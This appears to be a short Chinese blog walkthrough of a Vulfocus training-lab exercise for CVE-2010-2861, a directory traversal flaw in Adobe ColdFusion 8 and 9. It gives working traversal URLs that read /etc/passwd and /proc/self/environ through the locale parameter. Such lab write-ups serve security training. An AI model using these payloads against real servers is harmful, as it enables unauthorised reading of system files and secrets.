Vulfocus靶场 | coldfusion 文件读取 (CVE-2010-2861)

Adobe ColdFusion 文件读取漏

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。

Adobe ColdFusion 8、9

访问

http://ip:port/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

出现该页面则说明存在漏洞

获取flag

http://ip:port/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../proc/self/environ%00en

ctrl+F flag

posted @ 2022-08-10 21:15 mlxwl 阅读(211) 评论(0) 编辑收藏举报

刷新页面返回顶部